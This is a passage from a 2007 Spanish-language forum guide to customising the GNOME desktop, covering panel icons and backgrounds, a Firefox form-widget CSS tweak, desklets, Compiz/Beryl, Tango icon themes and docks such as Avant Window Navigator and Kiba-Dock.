      En esa que tiene la opción mencionada, activamos la de use_custom_icon y en el campo custom_icon colocamos la ruta completa de la imagen que queremos poner en el menú principal. Reiniciamos el panel con el comando killall gnome-panel y ¡listo! ya tienes tu menú principal personalizado. Para conseguir una imagen que se ajuste a esto, puedes usar cualquiera que desees o bajarte una de Gnome-Look.



      Botón que diseñé para usar en ArchLinux


      Cambiar el fondo del panel de Gnome:

      Últimamente han aparecido en Gnome-Look imágenes para usar como fondo de los paneles, que agregan un cierta transpariencia y dan mejor aspecto al escritorio. Para ello descarga uno de Gnome-Look (busca los que se llamen panel), le das clic derecho al panel que deseas cambiar el fondo, luego entra a Propiedades, pestaña Fondo y escogues el fondo ó color para el panel, también aqui puedes ajustar la transparencia del mismo.


      Ejemplo de fondos de paneles.


      Mejorar la apariencia del Firefox: (Ya Firefox3 no necesita esto)

      Esta es una extracción del artículo de Genbeta: Abre una terminal (Alt+F2 y escribe gnome-terminal) y escribe estos comandos uno por uno:

          wget No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          tar -xvzf firefox-form-widgets.tar.gz
          sudo cp /usr/lib/mozilla-firefox/res/forms.css /usr/lib/mozilla-firefox/res/forms.css.bak
          cat firefox-form-widgets/res/forms-extra.css | sudo tee --append /usr/lib/mozilla-firefox/res/forms.css > /dev/null
          sudo cp -r firefox-form-widgets/res/form-widgets /usr/lib/mozilla-firefox/res
          rm -rf firefox-form-widgets

      Esto hace que se mejore la apariencia de las fuentes, botones, caja de textos, barras de desplazamiento entre otras cosas. Por supuesto tienes que reiniciar el firefox una vez realizado los comandos anteriores.




      Observen como la de antes no tiene el suavizado de fuentes y mejorado de los botones a la imagen de la derecha que se le aplicó el truco.


      Agregar Desklets/Widgets/Gagdets a GNOME:

      Este tema para mí es un poco extenso, ya que existen varios programas que realizan estas cosas, cada una con sus pros y contras. En mi opinión lo unico que te puedo decir es que pruebes cada uno de los programas y te quedes con el mejor para ti:

          gDesklets: Se podría decir que es casi que el oficial de Gnome, tiene bastantes desklets,incluye configurador gráfico, apoyado por la mayoría.
          adesklets: Este está hecho en python, es liviano, sirve para cualquier tipo de escritorio, sencillo pero bueno, se configura por la línea de comandos.
          Screenlets: para mí el mejor, pero necesitar de Compiz/Beryl para que sirvan las transparencias, también hecho con python, incluye configurador gráfico, liviano.

      Ahora te queda que instales cada uno, lo pruebes y te quedes con el mejor.


      Efectos 3D, Transparencias y animaciones de las ventanas con GNOME:

      Para hacer todo esto debes consultar la página/wiki de tu distribución acerca de como instalar Beryl ó Compiz. Ya que este proceso depende bastante de la distro que uses y me es difícil listar pasos generales para el proceso de instalación.

      Cambiar íconos de los programas de GNOME:

      Muchos de los programas de GTK tales como Pidgin, Gftp, Liferea, entre otros. Se les pueden hacer unos hacks para cambiar los íconos del programa (en realidad sobreescribir todos los archivos de imágenes del programa), para ello entra en Gnome Look y busca por medio del nombre del programa, luego que escoges los íconos que deseas utilizar y lo descomprimes en la ruta que te indiquen en la página donde descargaste el archivo.

      Si quieres cambiar los íconos de casi todos los programas a los íconos de Tango, existe una aplicación que te automatiza el proceso de reemplazo, es muy buena y se la recomiendo. La consiguen aquí, ejecútenlo y de manera gráfica le informaran sobre el proceso de instalación/sustitución de los íconos.





      Ejemplo de los íconos Tango


      Docks para GNOME:

      Los 2 siguientes docks son para mi los mejores, ya que no solo actúan como lanzadores de programas, sino que también permite controlarlos, manejarlos y otras funciones como las del OSX.

          Avant-Window-Navigator: Es un dock sencillo, bueno, liviano y compatible con Gnome, configurador gráfico y necesita de AIGLX o XGL para hacer las transparencias.


      Avant Window Navigator


      Kiba-Dock:Este es mejor que el anterior pero un poco mas pesado, cumple con casi todas las funciones del dock de MacOsX, tiene un motor de física propio para realizar algunas animaciones, configuración de casi todo, necesita de AIGLX o XGL para hacer las transparencias.

      No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      Video demostrativo de Kiba-Dock


      Bueno esto ha sido la guía para que pongan el Gnome mas bonito. Espero que se hayan fijado en toda la personalización que se puede hacer bajo Linux, que es una envidia para otros Sistemas Operativos.

      Espero que les haya gustado la guía y recomiéndenla por ahi para que mas gente sepa de estas cosas, si tienen alguna duda, error, pregunta o problema no duden en contactarme.

      SKATOX - 2007.
      Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta